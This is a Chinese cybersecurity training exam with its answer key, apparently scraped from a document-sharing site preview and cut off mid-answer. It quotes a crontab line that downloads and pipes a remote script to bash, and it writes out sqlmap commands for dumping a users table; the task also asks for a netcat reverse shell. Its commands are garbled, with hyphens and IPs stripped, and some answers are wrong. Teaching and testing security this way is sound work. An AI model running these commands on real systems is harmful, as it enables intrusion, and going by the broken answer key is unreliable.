2025年網(wǎng)絡(luò)安全攻防培訓試卷及答案_第1頁
2025年網(wǎng)絡(luò)安全攻防培訓試卷及答案_第2頁
2025年網(wǎng)絡(luò)安全攻防培訓試卷及答案_第3頁
2025年網(wǎng)絡(luò)安全攻防培訓試卷及答案_第4頁
2025年網(wǎng)絡(luò)安全攻防培訓試卷及答案_第5頁
已閱讀5頁,還剩10頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)

文檔簡介

2025年網(wǎng)絡(luò)安全攻防培訓試卷及答案一、單項選擇題(共20題,每題2分,共40分)1.以下哪種攻擊方式利用了操作系統(tǒng)或應用程序在處理內(nèi)存時未正確驗證輸入長度的漏洞?A.SQL注入B.緩沖區(qū)溢出C.XSS跨站腳本D.CSRF跨站請求偽造2.在滲透測試中,使用`nmapsS`執(zhí)行的掃描類型是?A.全連接掃描B.SYN半開放掃描C.UDP掃描D.空閑掃描3.某Web應用返回錯誤信息:`ErrorinyourSQLsyntaxnear''1''LIMIT0,1'`,最可能存在哪種漏洞?A.文件包含B.命令注入C.SQL注入D.路徑遍歷4.以下哪項是APT(高級持續(xù)性威脅)攻擊的典型特征?A.利用0day漏洞快速獲利B.攻擊目標具有明確針對性C.通過釣魚郵件廣泛撒網(wǎng)D.攻擊周期短且破壞劇烈5.在Linux系統(tǒng)中,用于查看當前所有網(wǎng)絡(luò)連接狀態(tài)的命令是?A.`netstatan`B.`psef`C.`top`D.`ifconfig`6.以下哪種加密算法屬于對稱加密?A.RSAB.ECCC.AESD.SHA2567.某企業(yè)網(wǎng)絡(luò)中,攻擊者通過偽造DHCP服務(wù)器響應,使合法用戶獲取錯誤的DNS服務(wù)器地址,這種攻擊屬于?A.ARP欺騙B.DNS劫持C.MAC泛洪D.中間人攻擊8.在KaliLinux中,用于暴力破解Windows系統(tǒng)SAM文件密碼的工具是?A.HydraB.JohntheRipperC.MetasploitD.Wireshark9.以下哪項是Web應用防火墻(WAF)的主要功能?A.檢測并阻止SQL注入、XSS等攻擊B.加密傳輸數(shù)據(jù)C.管理內(nèi)部用戶權(quán)限D(zhuǎn).監(jiān)控主機文件變更10.當使用Metasploit框架進行漏洞利用時,`exploit/multi/handler`模塊的主要作用是?A.掃描目標漏洞B.生成惡意載荷C.監(jiān)聽并接收反彈ShellD.破解目標密碼11.以下哪種漏洞可能導致攻擊者直接獲取目標系統(tǒng)的最高權(quán)限(Root/Administrator)?A.存儲型XSSB.遠程代碼執(zhí)行(RCE)C.信息泄露D.邏輯漏洞12.在滲透測試中,“內(nèi)網(wǎng)穿透”的主要目的是?A.繞過防火墻限制訪問內(nèi)部資源B.竊取內(nèi)網(wǎng)用戶的明文密碼C.破壞內(nèi)網(wǎng)核心交換機D.監(jiān)控內(nèi)網(wǎng)流量13.某系統(tǒng)日志中出現(xiàn)大量`404NotFound`請求,且請求路徑包含`../etc/passwd`,最可能的攻擊類型是?A.文件包含B.路徑遍歷C.CSRFD.拒絕服務(wù)(DoS)14.以下哪項是社會工程學攻擊的典型手段?A.利用漏洞植入木馬B.通過釣魚郵件誘導用戶點擊鏈接C.掃描目標開放端口D.破解加密的數(shù)據(jù)庫文件15.在Android應用安全測試中,反編譯APK文件通常使用的工具是?A.BurpSuiteB.ApktoolC.SQLMapD.Nessus16.以下哪種協(xié)議默認使用443端口?A.HTTPB.FTPC.HTTPSD.SMTP17.攻擊者通過向目標系統(tǒng)發(fā)送大量ICMP請求包(Ping)導致其資源耗盡,這種攻擊屬于?A.SYNFloodB.PingofDeathC.DNS放大攻擊D.ARP欺騙18.在漏洞挖掘中,“模糊測試(Fuzzing)”的核心是?A.手動構(gòu)造異常輸入測試程序穩(wěn)定性B.分析目標系統(tǒng)的漏洞補丁C.掃描目標開放的服務(wù)端口D.破解目標加密通信19.以下哪項是零信任架構(gòu)(ZeroTrust)的核心原則?A.網(wǎng)絡(luò)邊界內(nèi)的所有設(shè)備默認可信B.持續(xù)驗證訪問請求的合法性C.僅允許管理員訪問關(guān)鍵資源D.使用單一防火墻隔離內(nèi)外網(wǎng)20.某惡意軟件通過感染可移動存儲設(shè)備(如U盤)傳播,其傳播機制最可能基于?A.漏洞利用B.自動運行(Autorun.inf)C.郵件附件D.網(wǎng)頁掛馬二、填空題(共10題,每題2分,共20分)1.常見的Web應用漏洞中,__________漏洞可通過輸入惡意腳本代碼,在用戶瀏覽器中執(zhí)行以竊取Cookie。2.滲透測試的三個階段通常為:信息收集、__________、維持訪問與清除痕跡。3.在Linux系統(tǒng)中,/etc/passwd文件存儲的是用戶賬戶的__________信息(填“加密密碼”或“明文密碼”)。4.用于檢測網(wǎng)絡(luò)流量中異常行為的系統(tǒng)稱為__________(英文縮寫)。5.緩沖區(qū)溢出攻擊中,攻擊者通過覆蓋__________指針(英文縮寫)來控制程序執(zhí)行流程。6.常見的端口掃描工具nmap中,p參數(shù)用于指定__________。7.數(shù)字簽名技術(shù)通常基于__________加密算法實現(xiàn)(填“對稱”或“非對稱”)。8.某漏洞的CVE編號為CVE20241234,其中“2024”表示__________。9.在Wireshark中,過濾HTTP協(xié)議的顯示過濾器表達式是__________。10.惡意軟件的“免殺”技術(shù)主要通過修改__________特征(如二進制代碼、行為模式)來繞過殺毒軟件檢測。三、簡答題(共4題,每題5分,共20分)1.簡述SQL注入攻擊的原理及常見防御措施。2.說明ARP欺騙的攻擊過程,并列舉至少兩種防御方法。3.什么是“反彈Shell”?在滲透測試中,反彈Shell相比正向連接有何優(yōu)勢?4.簡述IDS(入侵檢測系統(tǒng))與IPS(入侵防御系統(tǒng))的核心區(qū)別。四、綜合分析題(共1題,10分)某企業(yè)Web服務(wù)器(IP:00)被攻擊者植入后門,安全團隊通過日志分析發(fā)現(xiàn)以下異常:訪問日志:大量請求指向`/upload/file.php?filename=../../../../var/www/html/shell.php`系統(tǒng)日志:`/etc/crontab`文件被修改,新增一行`rootcurl:8080/getshell|bash`網(wǎng)絡(luò)流量:服務(wù)器與IP存在高頻TCP連接,端口8080請分析攻擊者的攻擊路徑,并提出至少三項針對性防御措施。五、實操題(共1題,10分)環(huán)境說明:提供一臺KaliLinux攻擊機(IP:00)和一臺靶機(IP:50,系統(tǒng):Ubuntu20.04,開放服務(wù):Apache2.4.48、MySQL5.7)。靶機Web應用存在SQL注入漏洞(URL:`50/login.php?username=test&password=test`)。任務(wù)要求:1.使用SQLMap工具檢測并利用該SQL注入漏洞,獲取MySQL數(shù)據(jù)庫中的`users`表數(shù)據(jù)(包含用戶名和密碼字段)。2.若`users`表中存在管理員賬戶(密碼為MD5加密),嘗試破解其明文密碼。3.最終通過獲取的權(quán)限,在靶機中植入一個反彈Shell(使用netcat,監(jiān)聽端口4444)。請寫出具體操作步驟及關(guān)鍵命令。答案一、單項選擇題1.B2.B3.C4.B5.A6.C7.D8.B9.A10.C11.B12.A13.B14.B15.B16.C17.B18.A19.B20.B二、填空題1.XSS(跨站腳本)2.漏洞利用3.明文(注:實際存儲的是加密后的密碼,此處為簡化表述)4.IDS(入侵檢測系統(tǒng))5.EIP(指令指針寄存器)6.掃描端口范圍7.非對稱8.漏洞發(fā)布年份9.`tcp.port==80`或`http`10.特征碼三、簡答題1.原理:攻擊者向Web應用輸入惡意SQL代碼,通過拼接或注入到后端數(shù)據(jù)庫查詢中,導致數(shù)據(jù)庫執(zhí)行非預期操作(如數(shù)據(jù)泄露、刪除)。防御措施:使用預編譯語句(PreparedStatement)、輸入?yún)?shù)校驗、限制數(shù)據(jù)庫權(quán)限、開啟WAF過濾惡意SQL字符。2.攻擊過程:攻擊者偽造ARP響應包,向局域網(wǎng)內(nèi)主機發(fā)送虛假的IPMAC映射(如將網(wǎng)關(guān)IP的MAC地址指向自己的網(wǎng)卡),導致主機將數(shù)據(jù)發(fā)送至攻擊者(中間人)。防御方法:綁定靜態(tài)ARP表、使用ARP防火墻檢測異常ARP包、部署交換機端口安全功能。3.反彈Shell:靶機主動連接攻擊機,建立一條從靶機到攻擊機的Shell通道。優(yōu)勢:繞過靶機防火墻對入站連接的限制(如攻擊機無法直接訪問靶機開放端口時,靶機可主動outbound連接攻擊機)。4.核心區(qū)別:IDS僅檢測并記錄入侵行為,不主動阻斷;IPS可在檢測到攻擊時實時阻斷(如丟棄惡意流量、重置連接)。四、綜合分析題攻擊路徑:①攻擊者利用路徑遍歷漏洞(通過`../../../../`跳轉(zhuǎn)目錄),將惡意文件`shell.php`寫入Web根目錄(/var/www/html),植入Web后門;②通過Web后門獲取系統(tǒng)權(quán)限后,修改`/etc/crontab`添加定時任務(wù),定期從惡意服務(wù)器(:8080)下載并執(zhí)行惡意腳本,維持持久化控制;③惡意服務(wù)器與靶機建立高頻連接,用于接收指令或傳輸數(shù)據(jù)。防御措施:①修復路徑遍歷漏洞(限制文件上傳目錄的訪問權(quán)限,禁止目錄跳轉(zhuǎn));②監(jiān)控`/etc/crontab`等關(guān)鍵系統(tǒng)文件的變更(使用Tripwire等文件完整性檢測工具);③封禁異常IP()的網(wǎng)絡(luò)連接,啟用入侵防御系統(tǒng)(IPS)阻斷惡意請求;④啟用Web應用防火墻(WAF)過濾包含`../`的異常請求。五、實操題步驟1:使用SQLMap檢測注入漏洞命令:`sqlmapu"50/login.php?username=test&password=test"dbs`(檢測目標數(shù)據(jù)庫,`dbs`參數(shù)列出所有數(shù)據(jù)庫)步驟2:利用漏洞獲取`users`表數(shù)據(jù)確認數(shù)據(jù)庫名(假設(shè)為`web_db`)后,執(zhí)行:`sqlmapu"50/login.php?username=test&password=test"Dweb_dbtables`(`D`指定數(shù)據(jù)庫,`tables`列出表)確認`users`表存在后,執(zhí)行:`sqlmapu"50/login.php?username=test&password=test"Dweb_dbTuserscolumns`(`T`指定表,`columns`列出字段)最后導出數(shù)據(jù):`sqlmapu"50/login.php?username=test&password=test"Dweb_dbTusersCusername,passworddump`(`C`指定字段,`dump`導出數(shù)據(jù))步驟3:破解MD5密碼假設(shè)獲取到管理員密碼哈希為`5f4dcc3b5aa765d61d8327deb882cf99`(對應明文“password”),使用JohntheRipper破解:命令:`echo"admin:5f4dcc3b5aa765d61d8327de

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
  • 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論